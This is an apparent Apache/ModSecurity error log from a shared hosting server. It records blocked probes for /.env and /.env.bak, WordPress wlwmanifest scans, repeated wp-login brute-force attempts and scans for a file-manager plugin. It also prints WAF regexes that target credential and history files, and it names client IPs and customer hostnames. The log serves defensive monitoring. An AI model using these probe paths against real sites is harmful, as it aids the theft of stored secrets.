[Tue May 26 14:47:17.687460 2026] [security2:error] [pid 648203:tid 648372] [client 195.178.110.34:38542] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/prod/.env"] [unique_id "ahVlHbEQDDtxJNiDrdTPmAAAAKw"]
[Tue May 26 14:47:17.863274 2026] [security2:error] [pid 648203:tid 648391] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlHbEQDDtxJNiDrdTPkAAAAL8"]
[Tue May 26 14:47:18.561443 2026] [security2:error] [pid 648203:tid 648345] [client 185.191.171.11:21596] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVlHrEQDDtxJNiDrdTPugAAAJE"]
[Tue May 26 14:47:18.561582 2026] [security2:error] [pid 648203:tid 648345] [client 185.191.171.11:21596] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVlHrEQDDtxJNiDrdTPugAAAJE"]
[Tue May 26 14:47:18.566979 2026] [security2:error] [pid 648203:tid 648449] [client 65.111.6.188:30855] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlHbEQDDtxJNiDrdTPlQAAAPk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:19.274412 2026] [security2:error] [pid 648203:tid 648448] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlHrEQDDtxJNiDrdTPywAAAPg"]
[Tue May 26 14:47:19.756360 2026] [security2:error] [pid 648203:tid 648348] [client 65.111.28.105:33757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.28.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlH7EQDDtxJNiDrdTP4wAAAJQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:21.056343 2026] [security2:error] [pid 648203:tid 648433] [client 209.50.185.253:34367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 253.185.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlILEQDDtxJNiDrdTQCQAAAOk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:22.119122 2026] [security2:error] [pid 648203:tid 648373] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlIbEQDDtxJNiDrdTQJwAAAK0"]
[Tue May 26 14:47:22.352337 2026] [core:error] [pid 648203:tid 648347] [client 213.180.203.9:64216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:47:22.352369 2026] [core:error] [pid 648203:tid 648347] [client 213.180.203.9:64216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:47:23.247445 2026] [security2:error] [pid 648203:tid 648348] [client 217.181.90.51:9245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlIrEQDDtxJNiDrdTQMwAAAJQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:24.793356 2026] [security2:error] [pid 648203:tid 648439] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJLEQDDtxJNiDrdTQgQAAAO8"]
[Tue May 26 14:47:25.247736 2026] [security2:error] [pid 648203:tid 648350] [client 45.154.98.38:60005] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJbEQDDtxJNiDrdTQogAAAJY"]
[Tue May 26 14:47:25.486302 2026] [security2:error] [pid 648203:tid 648411] [client 104.207.44.166:29735] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlJLEQDDtxJNiDrdTQfQAAANM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:25.564212 2026] [security2:error] [pid 648203:tid 648443] [client 114.119.155.83:22895] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVlJbEQDDtxJNiDrdTQsAAAAPM"], referer: http://glorodavionics.com/index.php?route=product%2Fproduct&path=72_84_116&product_id=120
[Tue May 26 14:47:26.125815 2026] [security2:error] [pid 648203:tid 648430] [client 45.154.98.38:60553] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJrEQDDtxJNiDrdTQyAAAAOY"]
[Tue May 26 14:47:26.292219 2026] [security2:error] [pid 648203:tid 648375] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJbEQDDtxJNiDrdTQugAAAK8"]
[Tue May 26 14:47:26.706834 2026] [security2:error] [pid 648203:tid 648372] [client 45.154.98.38:61091] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJrEQDDtxJNiDrdTQ3wAAAKw"]
[Tue May 26 14:47:26.748394 2026] [security2:error] [pid 648203:tid 648440] [client 209.50.166.19:49707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.166.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlJrEQDDtxJNiDrdTQ1AAAAPA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:27.284453 2026] [security2:error] [pid 648203:tid 648431] [client 45.154.98.38:61501] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJ7EQDDtxJNiDrdTQ9gAAAOc"]
[Tue May 26 14:47:27.490943 2026] [security2:error] [pid 648203:tid 648364] [client 195.178.110.34:52958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/.env.bak"] [unique_id "ahVlJ7EQDDtxJNiDrdTQ-gAAAKQ"]
[Tue May 26 14:47:27.601282 2026] [security2:error] [pid 648203:tid 648429] [client 146.174.163.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJ7EQDDtxJNiDrdTQ7wAAAOU"]
[Tue May 26 14:47:27.884470 2026] [security2:error] [pid 648203:tid 648438] [client 45.154.98.38:61851] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahVlJ7EQDDtxJNiDrdTRCAAAAO4"]
[Tue May 26 14:47:28.222218 2026] [security2:error] [pid 648203:tid 648400] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlJ7EQDDtxJNiDrdTRBQAAAMg"]
[Tue May 26 14:47:28.502539 2026] [security2:error] [pid 648203:tid 648363] [client 45.154.98.38:62237] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKLEQDDtxJNiDrdTRGgAAAKM"]
[Tue May 26 14:47:28.890908 2026] [security2:error] [pid 648203:tid 648380] [client 65.111.2.205:58009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlJ7EQDDtxJNiDrdTRAgAAALQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:29.079528 2026] [security2:error] [pid 648203:tid 648366] [client 45.154.98.38:62589] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKbEQDDtxJNiDrdTRJgAAAKY"]
[Tue May 26 14:47:29.594079 2026] [security2:error] [pid 648203:tid 648430] [client 114.119.156.227:24719] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/82q1r8jx/tv-telma-vo-zivo-mobile"] [unique_id "ahVlKbEQDDtxJNiDrdTRMAAAAOY"], referer: https://obinnawrites.com/82q1r8jx/tv-telma-vo-zivo-mobile
[Tue May 26 14:47:29.667240 2026] [security2:error] [pid 648203:tid 648456] [client 45.154.98.38:62952] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKbEQDDtxJNiDrdTRMQAAAQA"]
[Tue May 26 14:47:30.171793 2026] [security2:error] [pid 648203:tid 648406] [client 45.3.52.80:64355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 80.52.3.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlKbEQDDtxJNiDrdTRQQAAAM4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:30.268644 2026] [security2:error] [pid 648203:tid 648439] [client 45.154.98.38:63256] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKrEQDDtxJNiDrdTRRgAAAO8"]
[Tue May 26 14:47:30.857916 2026] [security2:error] [pid 648203:tid 648351] [client 45.154.98.38:63656] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahVlKrEQDDtxJNiDrdTRWQAAAJc"]
[Tue May 26 14:47:31.042730 2026] [security2:error] [pid 648203:tid 648363] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlKrEQDDtxJNiDrdTRWAAAAKM"]
[Tue May 26 14:47:31.468912 2026] [security2:error] [pid 648203:tid 648336] [client 45.154.98.38:64098] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVlK7EQDDtxJNiDrdTRagAAAIg"]
[Tue May 26 14:47:32.056911 2026] [security2:error] [pid 648203:tid 648455] [client 45.154.98.38:64571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "singhcouriercargo.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVlLLEQDDtxJNiDrdTRgAAAAP8"]
[Tue May 26 14:47:32.372667 2026] [security2:error] [pid 648203:tid 648425] [client 209.50.165.17:53245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlK7EQDDtxJNiDrdTRYwAAAOE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:33.198705 2026] [security2:error] [pid 648203:tid 648224] [remote 154.66.198.148:30676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVlLbEQDDtxJNiDrdTRpgAAwRQ"]
[Tue May 26 14:47:33.444036 2026] [security2:error] [pid 648203:tid 648404] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlLLEQDDtxJNiDrdTRoQAAAMw"]
[Tue May 26 14:47:34.461177 2026] [security2:error] [pid 648203:tid 648431] [client 65.111.27.75:13593] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlLbEQDDtxJNiDrdTRtgAAAOc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:35.749145 2026] [security2:error] [pid 648203:tid 648335] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlL7EQDDtxJNiDrdTR_QAAAIc"]
[Tue May 26 14:47:36.527802 2026] [security2:error] [pid 648203:tid 648345] [client 45.3.32.231:43011] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlL7EQDDtxJNiDrdTSAQAAAJE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:37.917906 2026] [security2:error] [pid 648203:tid 648450] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlMbEQDDtxJNiDrdTSWQAAAPo"]
[Tue May 26 14:47:38.562239 2026] [security2:error] [pid 648203:tid 648358] [client 209.50.181.226:17483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlMbEQDDtxJNiDrdTSWgAAAJ4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:38.781692 2026] [security2:error] [pid 648203:tid 648290] [remote 54.38.29.86:60256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVlMrEQDDtxJNiDrdTSewAA3lY"]
[Tue May 26 14:47:39.639958 2026] [security2:error] [pid 648203:tid 648372] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlM7EQDDtxJNiDrdTSkgAAAKw"]
[Tue May 26 14:47:40.764959 2026] [security2:error] [pid 648203:tid 648389] [client 65.111.12.76:50497] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlM7EQDDtxJNiDrdTSnAAAAL0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:42.569056 2026] [security2:error] [pid 648203:tid 648419] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlNrEQDDtxJNiDrdTS6AAAANs"]
[Tue May 26 14:47:42.834105 2026] [security2:error] [pid 648203:tid 648441] [client 216.26.252.154:17969] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlNbEQDDtxJNiDrdTS1AAAAPE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:44.082286 2026] [security2:error] [pid 648203:tid 648383] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlN7EQDDtxJNiDrdTTEwAAALc"]
[Tue May 26 14:47:45.038103 2026] [security2:error] [pid 648203:tid 648416] [client 65.111.20.246:13037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlN7EQDDtxJNiDrdTTGwAAANg"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:46.272193 2026] [security2:error] [pid 648203:tid 648439] [client 65.111.0.69:42709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.0.111.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlOrEQDDtxJNiDrdTTYwAAAO8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:47.366535 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlOrEQDDtxJNiDrdTTeQAAAM4"]
[Tue May 26 14:47:48.050539 2026] [security2:error] [pid 648203:tid 648347] [client 4.201.75.230:28837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmgAAAJM"]
[Tue May 26 14:47:48.050690 2026] [security2:error] [pid 648203:tid 648347] [client 4.201.75.230:28837] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmgAAAJM"]
[Tue May 26 14:47:48.126181 2026] [security2:error] [pid 648203:tid 648368] [client 4.201.75.230:28805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmwAAAKg"]
[Tue May 26 14:47:48.126324 2026] [security2:error] [pid 648203:tid 648368] [client 4.201.75.230:28805] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.iiachennai.in.svijaykumar.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmwAAAKg"]
[Tue May 26 14:47:48.206166 2026] [security2:error] [pid 648203:tid 648205] [remote 124.156.212.23:54849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTmAAA-QE"]
[Tue May 26 14:47:48.420565 2026] [security2:error] [pid 648203:tid 648386] [client 20.12.194.227:32058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.haddingtonwines.freshmindsolutions.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTogAAALo"]
[Tue May 26 14:47:48.420740 2026] [security2:error] [pid 648203:tid 648386] [client 20.12.194.227:32058] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.haddingtonwines.freshmindsolutions.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVlPLEQDDtxJNiDrdTTogAAALo"]
[Tue May 26 14:47:48.512177 2026] [security2:error] [pid 648203:tid 648336] [client 216.26.246.107:25337] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlO7EQDDtxJNiDrdTTgwAAAIg"], referer: https://velanstore.ca/wp-login.php
